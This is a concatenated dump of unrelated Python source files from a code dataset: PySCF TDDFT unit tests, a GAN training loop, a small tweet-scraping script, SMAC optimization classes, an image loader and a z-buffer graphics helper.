td = tdscf.uks.TDDFTNoHybrid(mf_lda).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0]
a,b = td.get_ab()
e_ref = diagonalize(a, b, 6)
self.assertAlmostEqual(abs(es[:3]-e_ref[:3]).max(), 0, 8)
self.assertAlmostEqual(lib.finger(es[:3]*27.2114), 1.2946309669294163, 6)
def test_nohbrid_b88p86(self):
td = tdscf.uks.TDDFTNoHybrid(mf_bp86).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0]
a,b = td.get_ab()
e_ref = diagonalize(a, b, 6)
self.assertAlmostEqual(abs(es[:3]-e_ref[:3]).max(), 0, 8)
self.assertAlmostEqual(lib.finger(es[:3]*27.2114), 1.4624730971221087, 6)
def test_tddft_lda(self):
td = tdscf.uks.TDDFT(mf_lda).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.2946309669294163, 6)
def test_tddft_b88p86(self):
td = tdscf.uks.TDDFT(mf_bp86).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.4624730971221087, 6)
def test_tddft_b3lyp(self):
td = tdscf.uks.TDDFT(mf_b3lyp).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.2984822994759448, 6)
def test_tda_b3lyp(self):
td = tdscf.TDA(mf_b3lyp).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.4303636271767162, 6)
def test_tda_lda(self):
td = tdscf.TDA(mf_lda).set(conv_tol=1e-12)
es = td.kernel(nstates=4)[0] * 27.2114
self.assertAlmostEqual(lib.finger(es[:3]), 1.4581538269747121, 6)
def test_ab_hf(self):
mf = scf.UHF(mol).run()
a, b = tdscf.TDDFT(mf).get_ab()
ftda = tdscf.uhf.gen_tda_operation(mf)[0]
ftdhf = tdscf.uhf.gen_tdhf_operation(mf)[0]
nocc_a = numpy.count_nonzero(mf.mo_occ[0] == 1)
nvir_a = numpy.count_nonzero(mf.mo_occ[0] == 0)
nocc_b = numpy.count_nonzero(mf.mo_occ[1] == 1)
nvir_b = numpy.count_nonzero(mf.mo_occ[1] == 0)
numpy.random.seed(2)
xa, ya = numpy.random.random((2,nocc_a,nvir_a))
xb, yb = numpy.random.random((2,nocc_b,nvir_b))
x = numpy.hstack((xa.ravel(), xb.ravel()))
y = numpy.hstack((ya.ravel(), yb.ravel()))
xy = numpy.hstack((x, y))
ax_a = numpy.einsum('iajb,jb->ia', a[0], xa)
ax_a+= numpy.einsum('iajb,jb->ia', a[1], xb)
ax_b = numpy.einsum('jbia,jb->ia', a[1], xa)
ax_b+= numpy.einsum('iajb,jb->ia', a[2], xb)
ax = numpy.hstack((ax_a.ravel(), ax_b.ravel()))
self.assertAlmostEqual(abs(ax - ftda([x])).max(), 0, 9)
ay_a = numpy.einsum('iajb,jb->ia', a[0], ya)
ay_a+= numpy.einsum('iajb,jb->ia', a[1], yb)
ay_b = numpy.einsum('jbia,jb->ia', a[1], ya)
ay_b+= numpy.einsum('iajb,jb->ia', a[2], yb)
ay = numpy.hstack((ay_a.ravel(), ay_b.ravel()))
bx_a = numpy.einsum('iajb,jb->ia', b[0], xa)
bx_a+= numpy.einsum('iajb,jb->ia', b[1], xb)
bx_b = numpy.einsum('jbia,jb->ia', b[1], xa)
bx_b+= numpy.einsum('iajb,jb->ia', b[2], xb)
bx = numpy.hstack((bx_a.ravel(), bx_b.ravel()))
by_a = numpy.einsum('iajb,jb->ia', b[0], ya)
by_a+= numpy.einsum('iajb,jb->ia', b[1], yb)
by_b = numpy.einsum('jbia,jb->ia', b[1], ya)
by_b+= numpy.einsum('iajb,jb->ia', b[2], yb)
by = numpy.hstack((by_a.ravel(), by_b.ravel()))
ab1 = ax + by
ab2 =-bx - ay
ab12 = numpy.hstack((ab1.ravel(),ab2.ravel()))
abxy_ref = ftdhf([xy])
self.assertAlmostEqual(abs(ab12 - abxy_ref).max(), 0, 9)
def test_ab_lda(self):
mf = mf_lda
a, b = tdscf.TDDFT(mf).get_ab()
ftda = tdscf.uhf.gen_tda_operation(mf)[0]
ftdhf = tdscf.uhf.gen_tdhf_operation(mf)[0]
nocc_a = numpy.count_nonzero(mf.mo_occ[0] == 1)
nvir_a = numpy.count_nonzero(mf.mo_occ[0] == 0)
nocc_b = numpy.count_nonzero(mf.mo_occ[1] == 1)
nvir_b = numpy.count_nonzero(mf.mo_occ[1] == 0)
numpy.random.seed(2)
xa, ya = numpy.random.random((2,nocc_a,nvir_a))
xb, yb = numpy.random.random((2,nocc_b,nvir_b))
x = numpy.hstack((xa.ravel(), xb.ravel()))
y = numpy.hstack((ya.ravel(), yb.ravel()))
xy = numpy.hstack((x, y))
ax_a = numpy.einsum('iajb,jb->ia', a[0], xa)
ax_a+= numpy.einsum('iajb,jb->ia', a[1], xb)
ax_b = numpy.einsum('jbia,jb->ia', a[1], xa)
ax_b+= numpy.einsum('iajb,jb->ia', a[2], xb)
ax = numpy.hstack((ax_a.ravel(), ax_b.ravel()))
self.assertAlmostEqual(abs(ax - ftda([x])).max(), 0, 9)
ay_a = numpy.einsum('iajb,jb->ia', a[0], ya)
ay_a+= numpy.einsum('iajb,jb->ia', a[1], yb)
ay_b = numpy.einsum('jbia,jb->ia', a[1], ya)
ay_b+= numpy.einsum('iajb,jb->ia', a[2], yb)
ay = numpy.hstack((ay_a.ravel(), ay_b.ravel()))
bx_a = numpy.einsum('iajb,jb->ia', b[0], xa)
bx_a+= numpy.einsum('iajb,jb->ia', b[1], xb)
bx_b = numpy.einsum('jbia,jb->ia', b[1], xa)
bx_b+= numpy.einsum('iajb,jb->ia', b[2], xb)
bx = numpy.hstack((bx_a.ravel(), bx_b.ravel()))
by_a = numpy.einsum('iajb,jb->ia', b[0], ya)
by_a+= numpy.einsum('iajb,jb->ia', b[1], yb)
by_b = numpy.einsum('jbia,jb->ia', b[1], ya)
by_b+= numpy.einsum('iajb,jb->ia', b[2], yb)
by = numpy.hstack((by_a.ravel(), by_b.ravel()))
ab1 = ax + by
ab2 =-bx - ay
ab12 = numpy.hstack((ab1.ravel(),ab2.ravel()))
abxy_ref = ftdhf([xy])
self.assertAlmostEqual(abs(ab12 - abxy_ref).max(), 0, 9)
def test_ab_b3lyp(self):
mf = mf_b3lyp
a, b = tdscf.TDDFT(mf).get_ab()
ftda = tdscf.uhf.gen_tda_operation(mf)[0]
ftdhf = tdscf.uhf.gen_tdhf_operation(mf)[0]
nocc_a = numpy.count_nonzero(mf.mo_occ[0] == 1)
nvir_a = numpy.count_nonzero(mf.mo_occ[0] == 0)
nocc_b = numpy.count_nonzero(mf.mo_occ[1] == 1)
nvir_b = numpy.count_nonzero(mf.mo_occ[1] == 0)
numpy.random.seed(2)
xa, ya = numpy.random.random((2,nocc_a,nvir_a))
xb, yb = numpy.random.random((2,nocc_b,nvir_b))
x = numpy.hstack((xa.ravel(), xb.ravel()))
y = numpy.hstack((ya.ravel(), yb.ravel()))
xy = numpy.hstack((x, y))
ax_a = numpy.einsum('iajb,jb->ia', a[0], xa)
ax_a+= numpy.einsum('iajb,jb->ia', a[1], xb)
ax_b = numpy.einsum('jbia,jb->ia', a[1], xa)
ax_b+= numpy.einsum('iajb,jb->ia', a[2], xb)
ax = numpy.hstack((ax_a.ravel(), ax_b.ravel()))
self.assertAlmostEqual(abs(ax - ftda([x])).max(), 0, 9)
ay_a = numpy.einsum('iajb,jb->ia', a[0], ya)
ay_a+= numpy.einsum('iajb,jb->ia', a[1], yb)
ay_b = numpy.einsum('jbia,jb->ia', a[1], ya)
ay_b+= numpy.einsum('iajb,jb->ia', a[2], yb)
ay = numpy.hstack((ay_a.ravel(), ay_b.ravel()))
bx_a = numpy.einsum('iajb,jb->ia', b[0], xa)
bx_a+= numpy.einsum('iajb,jb->ia', b[1], xb)
bx_b = numpy.einsum('jbia,jb->ia', b[1], xa)
bx_b+= numpy.einsum('iajb,jb->ia', b[2], xb)
bx = numpy.hstack((bx_a.ravel(), bx_b.ravel()))
by_a = numpy.einsum('iajb,jb->ia', b[0], ya)
by_a+= numpy.einsum('iajb,jb->ia', b[1], yb)
by_b = numpy.einsum('jbia,jb->ia', b[1], ya)
by_b+= numpy.einsum('iajb,jb->ia', b[2], yb)
by = numpy.hstack((by_a.ravel(), by_b.ravel()))
ab1 = ax + by
ab2 =-bx - ay
ab12 = numpy.hstack((ab1.ravel(),ab2.ravel()))
abxy_ref = ftdhf([xy])
self.assertAlmostEqual(abs(ab12 - abxy_ref).max(), 0, 9)
def test_nto(self):
mf = scf.UHF(mol).run()
td = tdscf.TDA(mf).run()
w, nto = td.get_nto(state=1)
self.assertAlmostEqual(w[0][0], 0.00018520143461015, 9)
self.assertAlmostEqual(w[1][0], 0.99963372674044326, 9)
self.assertAlmostEqual(lib.finger(w[0]), 0.00027305600430816, 9)
self.assertAlmostEqual(lib.finger(w[1]), 0.99964370569529093, 9)
pmol = copy.copy(mol)
pmol.symmetry = True
pmol.build(0, 0)
mf = scf.UHF(pmol).run()
td = tdscf.TDA(mf).run(nstates=3)
w, nto = td.get_nto(state=0)
self.assertAlmostEqual(w[0][0], 0.00018520143461016, 9)
self.assertAlmostEqual(w[1][0], 0.99963372674044326, 9)
self.assertAlmostEqual(lib.finger(w[0]), 0.00027305600430816, 9)
self.assertAlmostEqual(lib.finger(w[1]), 0.99964370569529093, 9)
w, nto = td.get_nto(state=-1)
self.assertAlmostEqual(w[0][0], 0.00236940007134660, 9)
self.assertAlmostEqual(w[1][0], 0.99759687228056182, 9)
def test_analyze(self):
f = td_hf.oscillator_strength(gauge='length')
self.assertAlmostEqual(lib.finger(f), 0.16147450863004867, 7)
f = td_hf.oscillator_strength(gauge='velocity', order=2)
self.assertAlmostEqual(lib.finger(f), 0.19750347627735745, 6)
td_hf.analyze()
def test_init(self):
hf = scf.UHF(mol)
ks = scf.UKS(mol)
kshf = scf.UKS(mol).set(xc='HF')
self.assertTrue(isinstance(tdscf.TDA(hf), tdscf.uhf.TDA))
self.assertTrue(isinstance(tdscf.TDA(ks), tdscf.uks.TDA))
self.assertTrue(isinstance(tdscf.TDA(kshf), tdscf.uks.TDA))
self.assertTrue(isinstance(tdscf.RPA(hf), tdscf.uhf.TDHF))
self.assertTrue(isinstance(tdscf.RPA(ks), tdscf.uks.TDDFTNoHybrid))
self.assertTrue(isinstance(tdscf.RPA(kshf), tdscf.uks.TDDFT))
self.assertTrue(isinstance(tdscf.TDDFT(hf), tdscf.uhf.TDHF))
self.assertTrue(isinstance(tdscf.TDDFT(ks), tdscf.uks.TDDFTNoHybrid))
self.assertTrue(isinstance(tdscf.TDDFT(kshf), tdscf.uks.TDDFT))
self.assertRaises(RuntimeError, tdscf.dRPA, hf)
self.assertTrue(isinstance(tdscf.dRPA(kshf), tdscf.uks.dRPA))
self.assertTrue(isinstance(tdscf.dRPA(ks), tdscf.uks.dRPA))
self.assertRaises(RuntimeError, tdscf.dTDA, hf)
self.assertTrue(isinstance(tdscf.dTDA(kshf), tdscf.uks.dTDA))
self.assertTrue(isinstance(tdscf.dTDA(ks), tdscf.uks.dTDA))
def test_tda_with_wfnsym(self):
pmol = mol.copy()
pmol.symmetry = True
pmol.build(0, 0)
mf = dft.UKS(pmol).run()
td = tdscf.uks.TDA(mf)
td.wfnsym = 'B1'
es = td.kernel(nstates=3)[0]
self.assertAlmostEqual(lib.finger(es), 0.16350926466999033, 6)
td.analyze()
def test_tdhf_with_wfnsym(self):
pmol = mol.copy()
pmol.symmetry = True
pmol.build()
mf = scf.UHF(pmol).run()
td = tdscf.uhf.TDHF(mf)
td.wfnsym = 'B1'
td.nroots = 3
es = td.kernel()[0]
self.assertAlmostEqual(lib.finger(es), 0.11306948533259675, 6)
td.analyze()
def test_tddft_with_wfnsym(self):
pmol = mol.copy()
pmol.symmetry = True
pmol.build()
mf = dft.UKS(pmol).run()
td = tdscf.uks.TDDFTNoHybrid(mf)
td.wfnsym = 'B1'
td.nroots = 3
es = td.kernel()[0]
self.assertAlmostEqual(lib.finger(es), 0.15403661700414412, 6)
td.analyze()
if __name__ == "__main__":
print("Full Tests for TD-UKS")
unittest.main()
| [
"[email protected]"
] | |
8aa66e9bfbe8bd636da164d691be14c9753a0cf6 | 2e318c8fdbb8e8826937ffbf1eede7034a47960a | /GazeGAN_using_CSC/train_old1.py | 3a4c6f4bdfa7d3250a264ab2b5f775c39e7fdeb4 | [] | no_license | chenkeshuai/Sal-CFS-GAN | e06efbe5e49360c8f5634704c487483795c10d31 | 8ae0fb77efff503190bcc8b6333c1d21ea1bfbce | refs/heads/master | 2022-06-06T01:18:00.664722 | 2020-05-06T10:54:11 | 2020-05-06T10:54:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,507 | py | ### Copyright (C) 2017 NVIDIA Corporation. All rights reserved.
### Licensed under the CC BY-NC-SA 4.0 license (https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode).
import time
from collections import OrderedDict
from options.train_options import TrainOptions
from data.data_loader import CreateDataLoader
from models.models import create_model
import util.util as util
from util.visualizer import Visualizer
import os
import numpy as np
import torch
from torch.autograd import Variable
opt = TrainOptions().parse()
iter_path = os.path.join(opt.checkpoints_dir, opt.name, 'iter.txt')
if opt.continue_train:
try:
start_epoch, epoch_iter = np.loadtxt(iter_path , delimiter=',', dtype=int)
except:
start_epoch, epoch_iter = 1, 0
print('Resuming from epoch %d at iteration %d' % (start_epoch, epoch_iter))
else:
start_epoch, epoch_iter = 1, 0
if opt.debug:
opt.display_freq = 1
opt.print_freq = 1
opt.niter = 1
opt.niter_decay = 0
opt.max_dataset_size = 10
data_loader = CreateDataLoader(opt)
dataset = data_loader.load_data()
dataset_size = len(data_loader)
print('#training images = %d' % dataset_size)
model = create_model(opt)
visualizer = Visualizer(opt)
total_steps = (start_epoch-1) * dataset_size + epoch_iter
display_delta = total_steps % opt.display_freq
print_delta = total_steps % opt.print_freq
save_delta = total_steps % opt.save_latest_freq
My_Limit = 600 # just for debugging phase, to control the total training steps for saving time
for epoch in range(start_epoch, opt.niter + opt.niter_decay + 1):
epoch_start_time = time.time()
if epoch != start_epoch:
epoch_iter = epoch_iter % dataset_size
for i, data in enumerate(dataset, start=epoch_iter):
if(i > My_Limit):
break
iter_start_time = time.time()
total_steps += opt.batchSize
epoch_iter += opt.batchSize
# whether to collect output images
save_fake = total_steps % opt.display_freq == display_delta
############## Forward Pass ######################
losses, generated = model(Variable(data['label']), Variable(data['inst']),
Variable(data['image']), Variable(data['feat']), infer=save_fake)
# sum per device losses
losses = [ torch.mean(x) if not isinstance(x, int) else x for x in losses ]
loss_dict = dict(zip(model.module.loss_names, losses))
print("loss dict is :", loss_dict)
# calculate final loss scalar
# loss_D = (loss_dict['D_fake'] + loss_dict['D_real']) * 0.5
# loss_G = loss_dict['G_GAN'] + loss_dict.get('G_GAN_Feat',0) + loss_dict.get('G_VGG',0)
loss_D = (loss_dict['D_fake'] + loss_dict['D_real']) * 0.5
loss_G = loss_dict['G_GAN'] + loss_dict.get('G_GAN_Feat',0) + loss_dict.get('G_VGG',0) + loss_dict.get('Loss_CC',0)
print("CC loss is :", loss_dict.get('Loss_CC',0))
############### Backward Pass ####################
# update generator weights
model.module.optimizer_G.zero_grad()
loss_G.backward()
model.module.optimizer_G.step()
# update discriminator weights
model.module.optimizer_D.zero_grad()
loss_D.backward()
model.module.optimizer_D.step()
#call(["nvidia-smi", "--format=csv", "--query-gpu=memory.used,memory.free"])
############## Display results and errors ##########
### print out errors
if total_steps % opt.print_freq == print_delta:
            # pre-0.4 PyTorch idiom; on newer versions use v.item() instead of v.data[0]
            errors = {k: v.data[0] if not isinstance(v, int) else v for k, v in loss_dict.items()}
t = (time.time() - iter_start_time) / opt.batchSize
visualizer.print_current_errors(epoch, epoch_iter, errors, t)
visualizer.plot_current_errors(errors, total_steps)
### display output images
if save_fake:
visuals = OrderedDict([('input_label', util.tensor2label(data['label'][0], opt.label_nc)),
('synthesized_image', util.tensor2im(generated.data[0])),
('real_image', util.tensor2im(data['image'][0]))])
visualizer.display_current_results(visuals, epoch, total_steps)
### save latest model
if total_steps % opt.save_latest_freq == save_delta:
print('saving the latest model (epoch %d, total_steps %d)' % (epoch, total_steps))
model.module.save('latest')
np.savetxt(iter_path, (epoch, epoch_iter), delimiter=',', fmt='%d')
if epoch_iter >= dataset_size:
break
# end of epoch
iter_end_time = time.time()
print('End of epoch %d / %d \t Time Taken: %d sec' %
(epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))
'''
### save model for this epoch
if epoch % opt.save_epoch_freq == 0:
print('saving the model at the end of epoch %d, iters %d' % (epoch, total_steps))
model.module.save('latest')
model.module.save(epoch)
np.savetxt(iter_path, (epoch+1, 0), delimiter=',', fmt='%d')
'''
### instead of only training the local enhancer, train the entire network after certain iterations
if (opt.niter_fix_global != 0) and (epoch == opt.niter_fix_global):
model.module.update_fixed_params()
### linearly decay learning rate after certain iterations
if epoch > opt.niter:
model.module.update_learning_rate()
| [
"[email protected]"
] | |
effa795ba011f8dc2f6b6da9ac6642b41478c955 | ac2567d2be46412f10a47aba6b062347fb831ec9 | /twitterTest.py | d48b78dc469f066c5c8a5c8ce76e0454cb493cd7 | [] | no_license | rhymg/TwitterScraping | e9e8d4098ba4d28cdb0d17f76de98a81c08432aa | 769effdbdf83a170c13d2cac51ca5df7956e2dab | refs/heads/master | 2022-11-24T11:46:46.637370 | 2020-07-18T19:19:17 | 2020-07-18T19:19:17 | 280,906,432 | 0 | 0 | null | 2020-07-19T16:34:18 | 2020-07-19T16:34:17 | null | UTF-8 | Python | false | false | 531 | py | import GetOldTweets3 as got
word = 'fuck'
f = open("usernameTest.txt", "a")
tweetCriteria = got.manager.TweetCriteria().setQuerySearch(word).setMaxTweets(10)
tweets = got.manager.TweetManager.getTweets(tweetCriteria)
for tweet in tweets:
    print(tweet.text + ' BY: ' + tweet.username + '\n')
    if word in tweet.text.lower():
        print('This has ' + word + ' in it.\n')
        f.write(tweet.username + '\n')
    else:
        print('This does not have ' + word + ' in it.\n')
f.close()
| [
"[email protected]"
] | |
e0764768d0223253f5b731c708b8922ab74d8968 | 5ca0124a85bae76c73643246372898823345d5a9 | /pc_smac/pc_smbo/pc_smbo.py | 1f7aabbf310d2acffee21d378336e2e4064140b0 | [] | no_license | jtuyls/pc_smac | 8ebdd76e4ea2ce837dfd7d03d37f446a86094c57 | 0a6e8719438a3f510e0aaeda19c14dd8005d8c65 | refs/heads/master | 2021-08-14T18:15:00.162943 | 2017-06-10T10:52:56 | 2017-06-10T10:52:56 | 76,661,120 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,167 | py |
# This file is heavily based on the pc_smbo file of SMAC which can be found here:
# https://github.com/automl/SMAC3
import itertools
import math
import numpy as np
import logging
import typing
import time
import random
from smac.optimizer.base_solver import BaseSolver
from smac.epm.rf_with_instances import RandomForestWithInstances
from smac.optimizer.local_search import LocalSearch
from smac.intensification.intensification import Intensifier
from smac.optimizer import pSMAC
from smac.scenario.scenario import Scenario
from smac.runhistory.runhistory import RunHistory
from smac.runhistory.runhistory2epm import AbstractRunHistory2EPM
from smac.stats.stats import Stats
from smac.initial_design.initial_design import InitialDesign
from smac.tae.execute_ta_run import FirstRunCrashedException
from smac.optimizer.select_configurations import SelectConfigurations
class PCSMBO(BaseSolver):
def __init__(self,
scenario: Scenario,
stats: Stats,
initial_design: InitialDesign,
runhistory: RunHistory,
runhistory2epm: AbstractRunHistory2EPM,
intensifier: Intensifier,
aggregate_func: callable,
num_run: int,
model: RandomForestWithInstances,
rng: np.random.RandomState,
select_configuration: SelectConfigurations,
double_intensification: bool):
'''
Interface that contains the main Bayesian optimization loop
Parameters
----------
scenario: smac.scenario.scenario.Scenario
Scenario object
stats: Stats
statistics object with configuration budgets
initial_design: InitialDesign
initial sampling design
runhistory: RunHistory
runhistory with all runs so far
runhistory2epm : AbstractRunHistory2EPM
Object that implements the AbstractRunHistory2EPM to convert runhistory data into EPM data
intensifier: Intensifier
intensification of new challengers against incumbent configuration (probably with some kind of racing on the instances)
aggregate_func: callable
how to aggregate the runs in the runhistory to get the performance of a configuration
num_run: int
id of this run (used for pSMAC)
model: RandomForestWithInstances
empirical performance model (right now, we support only RandomForestWithInstances)
rng: np.random.RandomState
Random number generator
'''
self.logger = logging.getLogger("SMBO")
self.incumbent = None
self.scenario = scenario
self.config_space = scenario.cs
self.stats = stats
self.initial_design = initial_design
self.runhistory = runhistory
self.rh2EPM = runhistory2epm
self.intensifier = intensifier
self.aggregate_func = aggregate_func
self.num_run = num_run
self.model = model
self.rng = rng
self.select_configuration = select_configuration
self.double_intensification = double_intensification
def run(self):
'''
Runs the Bayesian optimization loop
Returns
----------
incumbent: np.array(1, H)
The best found configuration
'''
self.stats.start_timing()
try:
self.incumbent = self.initial_design.run()
except FirstRunCrashedException as err:
if self.scenario.abort_on_first_run_crash:
raise
# Main BO loop
iteration = 1
while True:
if self.scenario.shared_model:
pSMAC.read(run_history=self.runhistory,
output_directory=self.scenario.output_dir,
configuration_space=self.config_space,
logger=self.logger)
start_time = time.time()
X, Y = self.rh2EPM.transform(self.runhistory)
#print("Shapes: {}, {}".format(X.shape, Y.shape))
self.logger.debug("Search for next configuration")
if self.double_intensification:
# get all found configurations sorted according to acq
challengers_smac, challengers_random = \
self.select_configuration.run(X, Y,
incumbent=self.incumbent,
num_configurations_by_random_search_sorted=100,
num_configurations_by_local_search=10,
double_intensification=self.double_intensification)
time_spend = time.time() - start_time
logging.debug(
"Time spend to choose next configurations: %.2f sec" % (time_spend))
self.logger.debug("Intensify")
start_time_random = time.time()
self.incumbent, inc_perf = self.intensifier.intensify(
challengers=challengers_random,
incumbent=self.incumbent,
run_history=self.runhistory,
aggregate_func=self.aggregate_func,
time_bound=max(0.01, time_spend / 2.),
min_number_of_runs=1)
time_spend_random = time.time() - start_time_random
#print("IN BETWEEN INTENSIFICATIONS")
self.incumbent, inc_perf = self.intensifier.intensify(
challengers=challengers_smac,
incumbent=self.incumbent,
run_history=self.runhistory,
aggregate_func=self.aggregate_func,
time_bound=max(0.01, time_spend_random),
min_number_of_runs=1)
else:
# get all found configurations sorted according to acq
challengers = \
self.select_configuration.run(X, Y,
incumbent=self.incumbent,
num_configurations_by_random_search_sorted=100,
num_configurations_by_local_search=10,
double_intensification=self.double_intensification)
#print("Challengers: {}".format(challengers))
time_spend = time.time() - start_time
logging.debug(
"Time spend to choose next configurations: %.2f sec" % (time_spend))
self.logger.debug("Intensify")
self.incumbent, inc_perf = self.intensifier.intensify(
challengers=challengers,
incumbent=self.incumbent,
run_history=self.runhistory,
aggregate_func=self.aggregate_func,
time_bound=max(0.01, time_spend),
min_number_of_runs=2)
print("Incumbent: {}, Performance: {}".format(self.incumbent, inc_perf))
if self.scenario.shared_model:
pSMAC.write(run_history=self.runhistory,
output_directory=self.scenario.output_dir,
num_run=self.num_run)
iteration += 1
logging.debug("Remaining budget: %f (wallclock), %f (ta costs), %f (target runs)" % (
self.stats.get_remaing_time_budget(),
self.stats.get_remaining_ta_budget(),
self.stats.get_remaining_ta_runs()))
if self.stats.is_budget_exhausted():
break
self.stats.print_stats(debug_out=True)
return self.incumbent
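
# A minimal construction sketch (every collaborator object comes from the SMAC
# framework; the argument values below are placeholders, not defaults taken
# from this file):
#
#   smbo = PCSMBO(scenario=scenario, stats=stats, initial_design=init_design,
#                 runhistory=rh, runhistory2epm=rh2epm, intensifier=intens,
#                 aggregate_func=np.mean, num_run=0, model=model, rng=rng,
#                 select_configuration=selector, double_intensification=False)
#   incumbent = smbo.run()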
class PCSMBOSigmoidRandomSearch(BaseSolver):
def __init__(self,
scenario: Scenario,
stats: Stats,
initial_design: InitialDesign,
runhistory: RunHistory,
runhistory2epm: AbstractRunHistory2EPM,
intensifier: Intensifier,
aggregate_func: callable,
num_run: int,
model: RandomForestWithInstances,
rng: np.random.RandomState,
select_configuration: SelectConfigurations):
'''
Interface that contains the main Bayesian optimization loop
Parameters
----------
scenario: smac.scenario.scenario.Scenario
Scenario object
stats: Stats
statistics object with configuration budgets
initial_design: InitialDesign
initial sampling design
runhistory: RunHistory
runhistory with all runs so far
runhistory2epm : AbstractRunHistory2EPM
Object that implements the AbstractRunHistory2EPM to convert runhistory data into EPM data
intensifier: Intensifier
intensification of new challengers against incumbent configuration (probably with some kind of racing on the instances)
aggregate_func: callable
how to aggregate the runs in the runhistory to get the performance of a configuration
num_run: int
id of this run (used for pSMAC)
model: RandomForestWithInstances
empirical performance model (right now, we support only RandomForestWithInstances)
rng: np.random.RandomState
Random number generator
'''
self.logger = logging.getLogger("SMBO")
self.incumbent = None
self.scenario = scenario
self.config_space = scenario.cs
self.stats = stats
self.initial_design = initial_design
self.runhistory = runhistory
self.rh2EPM = runhistory2epm
self.intensifier = intensifier
self.aggregate_func = aggregate_func
self.num_run = num_run
self.model = model
self.rng = rng
self.select_configuration = select_configuration
def run(self):
'''
Runs the Bayesian optimization loop
Returns
----------
incumbent: np.array(1, H)
The best found configuration
'''
self.stats.start_timing()
try:
self.incumbent = self.initial_design.run()
except FirstRunCrashedException as err:
if self.scenario.abort_on_first_run_crash:
raise
# Main BO loop
iteration = 1
intensification_runtime = 0
while True:
if self.scenario.shared_model:
pSMAC.read(run_history=self.runhistory,
output_directory=self.scenario.output_dir,
configuration_space=self.config_space,
logger=self.logger)
start_time = time.time()
X, Y = self.rh2EPM.transform(self.runhistory)
#print("Shapes: {}, {}".format(X.shape, Y.shape))
self.logger.debug("Search for next configuration")
# get all found configurations sorted according to acq
challengers = \
self.select_configuration.run(X, Y,
incumbent=self.incumbent,
timing_previous_run=intensification_runtime,
num_configurations_by_random_search_sorted=100,
num_configurations_by_local_search=10)
#print("Challengers: {}".format(challengers))
time_spend = time.time() - start_time
logging.debug(
"Time spend to choose next configurations: %.2f sec" % (time_spend))
self.logger.debug("Intensify")
start_time = time.time()
self.incumbent, inc_perf = self.intensifier.intensify(
challengers=challengers,
incumbent=self.incumbent,
run_history=self.runhistory,
aggregate_func=self.aggregate_func,
time_bound=max(0.01, time_spend),
min_number_of_runs=2)
intensification_runtime = time.time() - start_time
#print("Intensification runtime: {}".format(intensification_runtime))
#print("Incumbent: {}, Performance: {}".format(self.incumbent, inc_perf))
if self.scenario.shared_model:
pSMAC.write(run_history=self.runhistory,
output_directory=self.scenario.output_dir,
num_run=self.num_run)
iteration += 1
logging.debug("Remaining budget: %f (wallclock), %f (ta costs), %f (target runs)" % (
self.stats.get_remaing_time_budget(),
self.stats.get_remaining_ta_budget(),
self.stats.get_remaining_ta_runs()))
if self.stats.is_budget_exhausted():
break
self.stats.print_stats(debug_out=True)
return self.incumbent | [
"[email protected]"
] | |
ef7e4cf3a4bc9c1068b4866be245fb998a0ef38f | f8101363fff2bec14a152c3ba6d4d7f5e2e73c0a | /filehandler.py | 00455f9644e5cda9f545d150b167edf7f9015dc4 | [] | no_license | Adsime/TDT4173-A5 | 25e89ea4489454587a805bc5b58387c6c5bdf929 | 66d2547503c900b9d3e84d41c408fbc6243cdb31 | refs/heads/master | 2020-03-14T17:07:40.041536 | 2018-05-04T19:56:00 | 2018-05-04T19:56:00 | 131,712,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 716 | py | import matplotlib.image as img
from image import Image as dimg
import numpy as np
letter_path = "./data/chars74k-lite/"
detection_path = "./data/detection-images/detection-"
extension = ".jpg"
def read_letter_images(letter):
    # Samples are numbered consecutively (e.g. a/a_0.jpg, a/a_1.jpg, ...); keep
    # reading until the first missing index raises FileNotFoundError.
    letter_images = []
    try:
        i = 0
        while True:
            image = dimg(img.imread(letter_path + letter + "/" + letter + "_" + str(i) + extension), letter)
            letter_images.append(image)
            i += 1
    except FileNotFoundError:
        pass
print("Images for " + letter + " loaded successfully")
return np.array(letter_images)
def read_detection_image(identifier):
    return img.imread(detection_path + str(identifier) + extension)
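
# Minimal usage sketch (relies on the hard-coded ./data/ paths above):
#
#   letters = read_letter_images('a')   # every chars74k-lite sample for 'a'
#   scene = read_detection_image(1)     # ./data/detection-images/detection-1.jpg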
"[email protected]"
] | |
a1cc1637f3fb19d41494594668aa7c81e2d8aa00 | 2176442a012a0b73521d04e22bb9186a5e676321 | /display.py | 6a15632aad9ab6623c8adc9e5f6ee7278958dbf0 | [] | no_license | caleb-kahan/z-scan | 5e65c1382f60fed53fc36660ac5d36eecf2709e2 | 0ba703a99496c53a1d813ea0b9fa11679ec38d1f | refs/heads/master | 2022-04-17T08:32:54.662716 | 2020-04-19T00:55:44 | 2020-04-19T00:55:44 | 256,568,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,401 | py | from subprocess import Popen, PIPE
from os import remove
#constants
XRES = 500
YRES = 500
MAX_COLOR = 255
RED = 0
GREEN = 1
BLUE = 2
DEFAULT_COLOR = [0, 0, 0]
def new_screen( width = XRES, height = YRES ):
screen = []
for y in range( height ):
row = []
screen.append( row )
for x in range( width ):
screen[y].append( DEFAULT_COLOR[:] )
return screen
def new_zbuffer( width = XRES, height = YRES ):
zb = []
for y in range( height ):
row = [ float('-inf') for x in range(width) ]
zb.append( row )
return zb
def plot( screen, zbuffer, color, x, y, z ):
    # flip y so the origin sits at the bottom-left; draw only when the point is
    # on screen and in front of whatever the z-buffer already holds
    newy = YRES - 1 - y
    if ( x >= 0 and x < XRES and newy >= 0 and newy < YRES and z > zbuffer[newy][x]):
        screen[newy][x] = color[:]
        zbuffer[newy][x] = z
def clear_screen( screen ):
for y in range( len(screen) ):
for x in range( len(screen[y]) ):
